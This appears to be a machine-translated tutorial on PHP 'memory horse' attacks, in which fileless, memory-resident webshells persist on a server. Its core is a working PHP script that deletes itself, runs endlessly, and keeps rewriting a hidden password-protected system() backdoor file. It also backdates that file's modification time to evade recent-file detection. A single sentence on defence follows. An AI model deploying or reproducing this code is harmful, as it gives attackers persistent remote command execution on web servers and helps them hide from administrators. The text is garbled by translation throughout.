PHP memory horse

Basic concepts

Memory Trojan horse is an immortal horse , Generally, it will delete itself and create a hidden back door in the form of a process . Memory horse is a technical means of no file attack , Then we have to briefly introduce the no file attack first . No file attack can effectively avoid the detection of traditional security software , They can be loaded and executed remotely in the memory of the system 、 Reside in the registry or abuse commonly used whitelist tools , for example PowerShell,Windows Management Instrumentation(WMI) and PsExec etc. . File free attack technology allows attackers to access the system , To enable subsequent malicious activities . Exploit programs by manipulating them 、 Legal tools 、 Macros and scripts , Attackers can disrupt the system 、 Promote privileges or spread malicious code across the network . and , No file threat, no trace left after execution , This makes it difficult to detect and remove .
Here we only introduce PHP Memory horse .
PHP Memory Mali uses script parsing execution features , call PHP The runtime file provider dynamically loads malicious code , Then call PHP The runtime external command execution interface executes malicious code .

classification

① When PHP-FPM When enabled , adopt Fastcgi agreement （Fastcgi The protocol is a data exchange protocol between server middleware and backend ） towards PHP-FPM Initiate a request to execute any file . If PHP-FPM Can be accessed externally , Through Fastcgi The agreement can be directly requested PHP-FPM perform ” Any document ”.
② memory resident Webshell Usually in php When it comes to execution , Delete php Document body .

<?php
	ignore_user_abort(true);
	set_time_limit(0);
	unlink(__FILE__);
	$file = '/var/www/dvwa/.ski12.php';
	$code = '<?php if(md5($_POST["pass"])=="cdd7b7420654eb16c1e1b748d5b7c5b8"){@system($_POST[a]);}?>';
	while (1) {
    
		file_put_contents($file, $code);
		system('touch -m -d "2018-12-01 09:10:12" .ski12.php');
		usleep(5000);
	}
?>

ignore_user_abort() Function sets whether disconnection from the client will terminate the execution of the script . I'm going to set it to true The disconnection from the user is ignored , Even if you disconnect from the client, the script will still execute .

set_time_limit() Function to set the maximum execution time of the script . I'm going to set it to 0, That is, there is no time limit .

unlink(FILE) Delete the file itself , In order to play the role of concealing oneself .

while Every... In the cycle usleep(5000) That is, write a new backdoor file , middle system() The command executed is used to modify the creation or modification time of the file , To bypass “find –name ‘*.php’ –mmin -10” Command detect recent 10 Minutes modified or newly created PHP file , But not necessarily useful , Optional .

As for the final generated hidden back door, you need to verify one POST Parametric MD5 value , The reason is to prevent others from using .

Protection principle

Through to PHP Monitor the execution process , Association analysis of sensitive behaviors to identify such attacks